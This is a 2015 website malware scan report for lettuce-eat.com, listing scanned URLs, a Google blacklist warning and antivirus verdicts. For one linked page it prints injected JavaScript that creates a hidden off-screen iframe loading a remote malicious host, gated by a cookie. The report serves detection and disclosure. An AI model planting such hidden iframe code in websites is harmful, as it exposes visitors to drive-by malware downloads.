New scan:

Malware Scanner report for lettuce-eat.com

Malicious/Suspicious/Total urls checked
1/0/4
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "lettuce-eat.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=lettuce-eat.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://lettuce-eat.com/
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 15:30:07 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 2369
Content-Type: text/html
Last-Modified: Wed, 21 May 2014 21:23:49 GMT
clean
http://www.utahlaptops.com/sale/index.htm
200 OK
Content-Length: 2798
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- function hhmpp09() { var static='ajax'; var controller='index.php'; var hhmpp = document.createElement('iframe'); hhmpp.src = 'http://nkbk1.presenthost.net/wbdfCMxk.php'; hhmpp.style.position = 'absolute'; hhmpp.style.color = '5'; hhmpp.style.height = '5px'; hhmpp.style.width = '5px'; hhmpp.style.left = '10005'; hhmpp.style.top = '10005'; if (!document.getElementById('hhmpp')) { document.write('<p id=\'hhmpp\' class=\'hhmpp09\' ></p>'); document.getElementById('hhmpp').app
... 369 bytes are skipped ...
var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hhmpp09();}} -->

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
Trojan.JS.Iframe.DEE
Bkav
MW.Clod814.Trojan.60cf
Antiy-AVL
Trojan/JS.Iframe
Ikarus
Trojan.JS.IFrame
nProtect
Trojan.JS.Iframe.DEE
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.DEE (B)
McAfee-GW-Edition
JS/Redirector.bc
DrWeb
JS.IFrame.459
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
Sophos
Troj/JSRedir-MB
GData
Trojan.JS.Iframe.DEE
Commtouch
JS/IFrame.RS.gen
BitDefender
Trojan.JS.Iframe.DEE

http://www.utahlaptops.com/test404page.js
404 Not Found
Content-Length: 2674
Content-Type: text/html
clean
http://cdn.dsultra.com/js/registrar.js
200 OK
Content-Length: 1688
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: lettuce-eat.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 15:30:07 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 2369
Content-Type: text/html
Last-Modified: Wed, 21 May 2014 21:23:49 GMT

...2369 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lettuce-eat.com
Referer: http://www.google.com/search?q=lettuce-eat.com

Result:
The result is similar to the first query. There are no suspicious redirects found.